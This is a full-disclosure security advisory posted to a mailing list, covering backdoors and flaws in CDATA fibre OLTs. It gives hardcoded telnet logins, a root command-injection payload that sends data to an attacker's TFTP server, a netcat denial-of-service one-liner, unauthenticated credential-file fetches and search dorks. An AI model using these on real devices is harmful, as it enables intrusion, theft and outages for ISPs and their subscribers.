lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 7 Jul 2020 09:51:38 +0100
From: Pierre Kim <pierre.kim.sec@...il.com>
To: fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] Multiple vulnerabilities found in CDATA OLTs

Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on "Multiple vulnerabilities found in CDATA OLTs"
is posted here:
  https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html


=== text-version of the advisory  ===

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512


## Advisory Information

Title: Multiple vulnerabilities found in CDATA OLTs
Advisory URL: https://pierrekim.github.io/advisories/2020-cdata-0x00-olt.txt
Blog URL: https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html
Date published: 2020-07-07
Vendors contacted: None
Release mode: Full-Disclosure
CVE: None yet assigned



## Product Description

The CDATA OLTs are OEM FTTH OLTs, sold under different brands (Cdata,
OptiLink, V-SOL CN, BLIY), allowing to provide FTTH connectivity to a
large number of clients (using ONTs).
Some of the devices support multiple 10-gigabit uplinks and provide
Internet connectivity to up to 1024 ONTs (clients).

We validated the vulnerabilities against FD1104B and FD1108SN OLTs in
our lab environment with the latest firmware versions (V1.2.2 and
2.4.05_000, 2.4.04_001 and 2.4.03_000).

Using static analysis, these vulnerabilities also appear to affect all
available OLT models as the codebase is similar:

- - 72408A
- - 9008A
- - 9016A
- - 92408A
- - 92416A
- - 9288
- - 97016
- - 97024P
- - 97028P
- - 97042P
- - 97084P
- - 97168P
- - FD1002S
- - FD1104
- - FD1104B
- - FD1104S
- - FD1104SN
- - FD1108S
- - FD1204S-R2
- - FD1204SN
- - FD1204SN-R2
- - FD1208S-R2
- - FD1216S-R1
- - FD1608GS
- - FD1608SN
- - FD1616GS
- - FD1616SN
- - FD8000


- From the analyzed binaries, we extracted information about the OEM vendor:

    CDATA
    Flat 6, Bldg 4,South 2 of Honghualing Industrial Zone, Liuxian
Road, Xili Town, Shenzhen, Guangdong, China(518055)
    marketing@...tatec.com


For explanation about FTTH architecture, you can check my previous
research at http://pierrekim.github.io/blog/2016-11-01-gpon-ftth-networks-insecurity.html
.



## Vulnerabilities Summary

The summary of the vulnerabilities is:
1. Backdoor Access with telnet
2. Credentials infoleak and credentials in clear-text (telnet)
3. Escape shell with root privileges
4. Pre-Auth Remote DoS
5. Credentials infoleak and credentials in clear-text (HTTP)
6. Weak encryption algorithm
7. Insecure management interfaces



## Details - Backdoor Access with telnet

A telnet server is running in the appliance and is reachable from the
WAN interface and from the FTTH LAN interface (from the ONTs).

Depending on the firmware, the backdoor credentials may change. You
can find below a complete list of backdoor (undocumented) credentials,
giving an attacker a complete administrator CLI access.

Previous and old versions can be abused with:

    login: suma123
    password: panger123


New recent versions can be abused with:

    login: debug
    password: debug124

    login: root
    password: root126

    login: guest
    password: [empty]


[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html
to see the image]
Authentication process with hardcoded credentials


The credentials have been extracted from old and new firmware images.

About the credentials, it depends on the vendors and the version of
the firmware - the appearance of the CLI may be different but the
access still works.


- - Using `suma123`/`panger123`:

    $ telnet [ip]
    ********************************************************************
            Command Line Interface for EPON System
                     Hardware Ver:  V1.2
                     Software Ver:  V1.2.2
                     Created Time:  Mar 12 2018 06:54:24
        Copyright (c) 2015-2020 All rights reserved.
    ********************************************************************
    Username:panger123
    Password:suma123

    Entry Supperuer successfully!

    epon@
     alarm                     - setting system alarm
     best-sys                  - configure sys information
     epon-workmode             - configure EPON working-mode
     ethernet-ring             - configure rapid ring
     igmp-snooping             - configure IGMP Snooping
     interface                 - interface type
     ipconfig                  - configure the system IP address
     logout                    - exit the CLI system
     mac-address-table         - ctrl-card dynamic mac address table management
     mirror                    - configure switch mirror
     onu-auth                  - configure authentication mode for Olt
     ping                      - net ping
     port-isolate-group        - create port-isolate-group, you must
enable port-isolate-mode for group
     rmon                      - configure RMON
     rstp                      - rapid spanning tree protocol configuration
     show                      - show system configuration
     system                    - configure systerm
     trunk                     - enter trunk config mode
     undo                      - delete relational configuration
     vlan                      - enter vlan config mode
    epon@


- - Using guest/[empty]:

    $ telnet [ip]
    ********************************************************************
            Command Line Interface for EPON System
                     Hardware Ver:  V3.2
                     Software Ver:  2.4.04_001
                     Created Time:  Nov 27 2017 10:38:49
        Copyright (c) 2006-2015 All rights reserved.
    ********************************************************************
    Username:guest
    Password:[empty]
    epon#
    --------------------------------------------------
      Local Configuration Command
    --------------------------------------------------

    --------------------------------------------------
      Global Command
    --------------------------------------------------
     broadcast            - Write message to all users logged in
     clear                - Clear the screen
     history              - Show command history
     logout               - Log off this system
     ping                 - Ping a network hosts
     show                 - show system configuration
     tracert              - trace the route to host
     tree                 - Show command tree

    epon# show
    --------------------------------------------------
      Local Configuration Command
    --------------------------------------------------
     acl                  - Show ACL(s)
     auth                 - show olt auth mode
     dhcp-snooping        - show dhcp snooping configurations
     exec-timeout         - show cli console timeout
     igmp                 - show igmp snooping configurations
     mac-address          - mac-address
     mac-address-table    - show current port's mac address
     mirror               - show switch mirror configurations
     olt                  - show olt's configuration
     onu-position         - show the position of onu by mac
     qinq                 - show QinQ configuration
     rmon                 - show RMON
     rstp                 - Display RSTP information
     running-config       - show current running-configuration
     startup-config       - show current startup-configuration
     swmode               - show swmode
     swport               - display port attribute information
     system               - show system configuration
     trunk                - show trunk configuration
     vlan                 - show vlan configuration
     web                  - web server!
    epon#



- - Using root/root126:

    $ telnet [ip]
    ********************************************************************
            Command Line Interface for EPON System
                     Hardware Ver:  V3.2
                     Software Ver:  2.4.04_001
                     Created Time:  Nov 27 2017 10:38:49
        Copyright (c) 2006-2015 All rights reserved.
    ********************************************************************
    Username:root
    Password:root126
    epon#
    --------------------------------------------------
      Local Configuration Command
    --------------------------------------------------
     acl                  - Create ACL(s)
     acl-del              - Delete ACL(s)
     auth                 - configure authentication mode for Olt
     btv                  - btv
     cdt-sys              - configure sys information
     dhcp-snooping        - configure DHCP Snooping
     exec-timeout         - set a timeout value
     igmp                 - configure IGMP Snooping
     mac-address          - ctrl-card dynamic mac address table management
     mirror               - configure switch mirror
     multicast-vlan       - multicast-vlan <mvlan>
     no                   - no
     olt                  - configure OLT
     reset                - reset the values
     rmon                 - configure RMON
     rstp                 - rapid spanning tree protocol configuration
     swmode               - set basic switch mode
     swport               - enter switch port config mode
     system               - configure systerm
     trunk                - enter trunk config mode
     vlan                 - enter vlan config mode

    --------------------------------------------------
      Global Command
    --------------------------------------------------
     broadcast            - Write message to all users logged in
     clear                - Clear the screen
     debug                - debug
     history              - Show command history
     logout               - Log off this system
     ping                 - Ping a network hosts
     show                 - show system configuration
     tracert              - trace the route to host
     tree                 - Show command tree
     who                  - Display users currently logged in
    epon#


- - Using debug/debug124:

    $ telnet [ip]
    ********************************************************************
            Command Line Interface for EPON System
                     Hardware Ver:  V3.2
                     Software Ver:  2.4.04_001
                     Created Time:  Nov 27 2017 10:38:49
        Copyright (c) 2006-2015 All rights reserved.
    ********************************************************************
    Username:debug
    Password:debug124
    epon#
    --------------------------------------------------
      Local Configuration Command
    --------------------------------------------------
     acl                  - Create ACL(s)
     acl-del              - Delete ACL(s)
     auth                 - configure authentication mode for Olt
     btv                  - btv
     dhcp-snooping        - configure DHCP Snooping
     exec-timeout         - set a timeout value
     igmp                 - configure IGMP Snooping
     mac-address          - ctrl-card dynamic mac address table management
     mirror               - configure switch mirror
     multicast-vlan       - multicast-vlan <mvlan>
     no                   - no
     olt                  - configure OLT
     reset                - reset the values
     rmon                 - configure RMON
     rstp                 - rapid spanning tree protocol configuration
     swmode               - set basic switch mode
     swport               - enter switch port config mode
     system               - configure systerm
     trunk                - enter trunk config mode
     vlan                 - enter vlan config mode

    --------------------------------------------------
      Global Command
    --------------------------------------------------
     broadcast            - Write message to all users logged in
     clear                - Clear the screen
     debug                - debug
     history              - Show command history
     logout               - Log off this system
     ping                 - Ping a network hosts
     show                 - show system configuration
     tracert              - trace the route to host
     tree                 - Show command tree
     who                  - Display users currently logged in
    epon#


With these access, an attacker can completely overwrite the
configuration and overwrite the firmware.



## Details - Credentials infoleak and credentials in clear-text (telnet)

For this part, we suppose the attacker has a working CLI access (which
can be achieved using "backdoor access with telnet").

It is possible to extract administrator credentials by running this
command in the CLI:

    epon# show system infor
    Web Server
      Version          : V1.2.0
      BuildTime        : 19-04-23
      Administrator    : LOGIN_CLEAR_TEXT
      Password         : PASSWORD_CLEAR_TEXT



## Details - Escape shell with root privileges

For this part, we suppose the attacker has a working CLI access (which
can be achieved using "backdoor access with telnet").

There is a command injection in the CLI allowing an attacker to
execute commands as root.

The command injection is located in the TFTP download configuration part.

In our case, we used metasploit to start a TFTP server on
192.168.1.101 and to receive results of injected commands into this
TFTP server:

    $ msfconsole -q -x 'use auxiliary/server/tftp; run'


On the OLT:

    epon# system configurations download olt 192.168.1.101 "$(cat
/proc/cpuinfo > /tmp/test && tftp 192.168.1.101 put /tmp/test test)"
    Uncompress file failed!


On the TFTP server running on the attacker machine, we receive the
output of the command `cat /proc/cpuinfo`:

    $ cat /tmp/test
    system type             : Broadcom BCM956218
    processor               : 0
    cpu model               : Broadcom BCM3302 V5.0
    BogoMIPS                : 299.00
    wait instruction        : no
    microsecond timers      : yes
    tlb_entries             : 32
    extra interrupt vector  : no
    hardware watchpoint     : no
    ASEs implemented        : mips16
    VCED exceptions         : not available
    VCEI exceptions         : not available


It is also possible to exfiltrate information using the embedded webserver:

On the OLT:

    epon# system configurations download olt 192.168.1.101 "$(export >
/opt/lighttpd/web/cgi/out.txt)"

On the attacker machine:

    $ curl http://ip/cgi/out.txt
    export HOME='/broadcom/'
    export OLDPWD='/'
    export PATH='/sbin:/usr/sbin:/bin:/usr/bin'
    export PWD='/broadcom'
    export SHELL='/bin/sh'
    export TERM='vt102'
    export USER='root'


Futhermore, everything is running as `root` in the appliance:

    PID   USER     COMMAND
        1 0        init
        2 0        [ksoftirqd/0]
        3 0        [events/0]
        4 0        [khelper]
        5 0        [kthread]
        6 0        [kblockd/0]
        7 0        [sysled]
        8 0        [pdflush]
        9 0        [pdflush]
       10 0        [kswapd0]
       11 0        [aio/0]
       12 0        [mtdblockd]
       13 0        {rcS} /bin/sh /etc/rcS
       17 0        [jffs2_gcd_mtd5]
       23 0        [bkncmd]
       24 0        [bknevt]
       26 0        fd1008s.dat
       27 0        fd1008s.dat
       28 0        fd1008s.dat
       29 0        fd1008s.dat
       30 0        fd1008s.dat
       32 0        fd1008s.dat
       33 0        fd1008s.dat
       35 0        fd1008s.dat
       36 0        fd1008s.dat
       37 0        fd1008s.dat
       38 0        fd1008s.dat
       39 0        fd1008s.dat
       40 0        fd1008s.dat
       41 0        fd1008s.dat
       42 0        fd1008s.dat
       43 0        fd1008s.dat
       44 0        fd1008s.dat
       45 0        fd1008s.dat
       46 0        fd1008s.dat
       55 0        fd1008s.dat
       56 0        fd1008s.dat
       57 0        fd1008s.dat
       58 0        fd1008s.dat
       59 0        fd1008s.dat
       60 0        fd1008s.dat
       61 0        fd1008s.dat
       64 0        fd1008s.dat
       65 0        fd1008s.dat
       66 0        fd1008s.dat
       67 0        fd1008s.dat
       68 0        fd1008s.dat
       69 0        fd1008s.dat
       70 0        fd1008s.dat
       71 0        fd1008s.dat
       72 0        fd1008s.dat
      864 0        sh -c tftp 192.168.1.101 get $(ps a > /tmp/test &&
tftp 192.168.1.101 put /tmp/test test) /tmp/cfg_download.tar.gz
      865 0        sh -c tftp 192.168.1.101 get $(ps a > /tmp/test &&
tftp 192.168.1.101 put /tmp/test test) /tmp/cfg_download.tar.gz
      866 0        ps a



## Details - Pre-Auth Remote DoS

A telnet server is running in the appliance and is reachable from the
WAN interface and from the FTTH LAN interface (from the ONTs).

Using our cutting-edge fuzzing technology based on IA,
machine-learning and shawarma, we are able to reboot any OLT from this
vendor using this command:

    $ for i in $(seq 1 10); do cat /dev/urandom | nc 192.168.1.100 23
| hexdump -C;done

The device will reboot in the next 5 seconds and all the LEDs will
blink like a Christmas tree!



## Details - Credentials infoleak and credentials in clear-text (HTTP)

A web server is running in the appliance and is reachable from the WAN
interface and from the FTTH LAN interface (from the ONTs).

Without authentication, an attacker can extract web, telnet
credentials and SNMP communities (read and write) by fetching these
files:

    /opt/lighttpd/web/cgi/snmp_read.txt
    /opt/lighttpd/web/cgi/snmp_write.txt
    /opt/lighttpd/web/cgi/web_login.txt
    /opt/lighttpd/web/cgi/web_passwd.txt
    /opt/lighttpd/web/cgi/onu_name.txt
    /opt/lighttpd/web/cgi/oem.txt


Using `curl`:

    $ curl http://ip/cgi/snmp_read.txt
    $ curl http://ip/cgi/snmp_write.txt
    $ curl http://ip/cgi/oem.txt
    $ curl http://ip/cgi/onu_name.txt
    $ curl http://ip/cgi/web_passwd.txt
    $ curl http://ip/cgi/web_login.txt



## Details - Weak encryption algorithm

A custom encryption algorithm is used to store encrypted passwords.
This algorithm will XOR the password with the hardcoded value
"*j7a(L#yZ98sSd5HfSgGjMj8;Ss;d)(*&^#@...s0i3g" as shown below:

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html
to see the image]



## Details - Insecure management interfaces

By default, the appliance can be managed remotely only with HTTP,
telnet and SNMP. It doesn't support SSL/TLS for HTTP or SSH. An
attacker can intercept passwords sent in clear-text and MITM the
management of the appliance.



## Dorks

"EPON System"
"Optilink GEPON"



## Vendor Response

Full-disclosure is applied as we believe some backdoors are
intentionally placed by the vendor.



## Report Timeline

* Dec 27, 2019: Vulnerabilities found and this advisory was written.
* Jul 07, 2020: A public advisory is sent to security mailing lists.



## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec) and
Alexandre Torres.



## References

https://pierrekim.github.io/advisories/2020-cdata-0x00-olt.txt

https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAl8BvkcACgkQxD4O2n2T
LbwfiQ/+Kul1GvFr6xqPFFHnLvIimIFwco8PQk0olfOX/CNH6pCxOBFfYijw1a4o
1aO7g56k3WQParV8AluF26tAVnzy/+Ittv53yIOo/qPojFefJ7fF3YmvxhxEzyD2
fBgKw/NmiwXM9Pn9SFR+hLxeH/zdgHZvORUZ4c1wdmZmD/24nh/u+IUiHM3bIg75
s4PGwCJFGurREcs1fbFkaOAYao3nEftjTQIsGBVDeObJags3jqx0OkOMuTnT3Kge
HRJUiMsgmz6SehRrYvzsa47OqZNtXA2Tugmwmhy/iYTqX1LDAzP9uvvbfIPvyWbV
xM5LmD1iIuBsCZQzkRmapaToqnPCtjCRnhTDbSMu63NCpeLt7QMC9TbYlb150eCv
0EwnA4Y4rK2GfHIGinZm4/UBj+8M0alc17eLkzlzu67kagS7MDPJcq2zkf0Rj6e/
uapS+5UPVeEWzoFjBWti735l/zdG5Goa+qLhxYKQM0wuj7z7d3iGuGq5PI0LbQpE
YZ9p/I8AYfJF7MWxU4l8eyAnl00yVn8H/OW6HT+sQqmOgeFtpdEqWgI+jvLX/Q3A
yW1SSBrWvAEVDcoB84cxoTtaWEWKoZuDx16wvxd+di1Mv/qmSiWfcIf/sX0r1Yr9
V2SjsRZ0HnMRqCugk0fXInIFsC98pRZJHJ5+h7h7aSb0KRo8/zI=
=ATix
-----END PGP SIGNATURE-----

-- 
Pierre Kim
pierre.kim.sec@...il.com
@PierreKimSec
https://pierrekim.github.io/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists